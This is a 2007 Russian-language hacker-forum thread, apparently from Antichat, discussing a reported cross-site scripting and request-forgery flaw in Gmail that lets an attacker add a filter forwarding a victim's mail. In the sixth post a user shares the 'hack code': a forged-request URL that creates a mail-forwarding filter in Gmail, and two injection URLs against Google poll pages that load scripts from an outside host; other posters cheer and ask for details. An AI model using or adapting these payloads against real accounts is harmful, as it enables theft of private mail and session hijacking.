Новая уязвимость в сервисах Google: кража писем из Gmail

Discussion in 'Мировые новости. Обсуждения.' started by GiZZZ, 27 Sep 2007.

  1. GiZZZ

    GiZZZ Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    16
    Likes Received:
    14
    Reputations:
    1
    27.09.07, Чт, 14:04, Мск
    _http://internet.cnews.ru/news/line/index.shtml?2007/09/27/267960

    В дополнение к трем уязвимостям(я выкладывал новость вчера, но ее удалили...) в продуктах и сервисах Google – Groups, поисковой машине и Picasa, обнаруженным на этой неделе, в среду, 26 сентября, в системе сервисов портала найдена еще одна. Уязвимость позволяет похитить письма из ящика Gmail.

    Уязвимость обнаружил исследователь GNU Citizen Петко Петков (Petko D. Petkov), сообщает The Register. Она, как и три вышеупомянутые, относится к классу межсайтового скриптинга (CSS/XSS). При переходе по URL, содержащему JavaScript-код в значении одного из параметров вызова веб-страницы, этот код выполняется на самой странице от имени сайта, к которому обратился пользователь. Подобные уязвимости вызваны отсутствием проверки содержимого параметров перед тем, как вывести его на веб-страницу. Надежно написанные веб-приложения отсеивают HTML-тэги, включая JavaScript.

    Обычно при помощи CSS/XSS крадут куки с данными об авторизации или подгружают файлы, которые пользователь запустит, доверяя уязвимому сайту. В случае с Gmail злоумышленник может при помощи кода добавить в учетную запись фильтр, копирующий письма по указанному адресу. Для того чтобы уязвимость можно было использовать, в браузере жертвы должен быть открыт почтовый ящик Gmail.
     
    2 people like this.
  2. DCSTAJIKER

    DCSTAJIKER Banned

    Joined:
    1 May 2007
    Messages:
    3
    Likes Received:
    2
    Reputations:
    0
    и мне плз потому что сдеть сотрут если еще напишешь(
     
  3. GiZZZ

    GiZZZ Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    16
    Likes Received:
    14
    Reputations:
    1
    это лишь новость, опубликованная в СМИ
    все подробности и ссылки лишь у
    ;)
     
  4. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    935
    Likes Received:
    396
    Reputations:
    261
    Угу так и он что то кому то скажет :).
     
  5. GiZZZ

    GiZZZ Elder - Старейшина

    Joined:
    23 May 2007
    Messages:
    16
    Likes Received:
    14
    Reputations:
    1
    угу...именно это и имел ввиду)
     
  6. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Code:
    http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&[email protected]&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
    вот и сам хэк код кстати говоря)

    и ещё парочка, которые выложили раньше, но из-за непопулярности блога никто ничё незаметил)
    Code:
    http://mail.google.com/reviews/polls/display/159769971366811755/blogger_template/vote?purl=url.blogspot.com%2F&chrtclr=%23599be2&hideq=false&font=normal+normal+100%25+Helvetica%2CArial%2CVerdana%2C%20Trebuchet+MS%20%2C+Sans-serif&u_tz=%22%3E%3Cscript+src%3Dhttp://beford.org/stuff/prototype.js%3E%3C/script%3E%3Cscript+src%3Dhttp://beford.org/stuff/x2.js%3E%3C/script%3E%3Cnoscript%3E/
    Code:
    http://groups.google.com/reviews/polls/display/159769971366811755/blogger_template/vote?purl=blogspot.com%2F&chrtclr=%23599be2&hideq=false&font=normal+normal+100%25+Helvetica%2CArial%2CVerdana%2C%20Trebuchet+MS%20%2C+Sans-serif&u_tz=%22%3E%3Cscript+src%3Dhttp://beford.org/stuff/x.js%3E%3C/script%3E%3Cnoscript%3E/
     
    _________________________
    #6 +toxa+, 29 Sep 2007
    Last edited: 29 Sep 2007
    3 people like this.
  7. zooomer

    zooomer Banned

    Joined:
    17 Apr 2007
    Messages:
    11
    Likes Received:
    44
    Reputations:
    -14
    Хааа....Тоха респект....Новость интересная +) Репа..
     
  8. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    гг.. засекаем время когда закроют )
     
    2 people like this.
Loading...